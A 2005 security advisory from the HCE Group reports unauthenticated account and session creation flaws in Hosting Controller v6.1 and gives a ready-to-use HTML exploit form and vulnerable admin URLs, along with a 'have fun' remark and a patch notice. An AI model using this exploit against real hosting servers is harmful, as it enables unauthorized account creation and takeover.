Bug Hosting Controller New (v6.1 - Hotfix 2.1)

[kehieuhoc@xxxxxxxxx]

-= KeHieuHoc ? HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller

Vendor Homepage : http://www.hostingcontroller.com

Platforms : Windows based servers

Vulnerability : Multiple Unauthenticated information disclose

Risk : high

Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 2.1 )

Vendor Contacted : 09/07/2005

Release Date: : 11/07/2005



Summary

------------

Hosting Controller is a complete array of Web hosting automation tools for

the Windows Server family platform.

(I)

You can create new account on Hosting Controller

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"; 
method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

 You can create any ?session? which it is special for owner system

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 

 
 


Solution

----------



The vender was notified, they have released a patch.

Update Your software



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc ? HCE Group


Email: kehieuhoc@xxxxxxxxx

 

References

-------------



http://hcegroup.net

 

------------------------------ //  KeHieuHoc ? HCE Group \\ 
------------------------------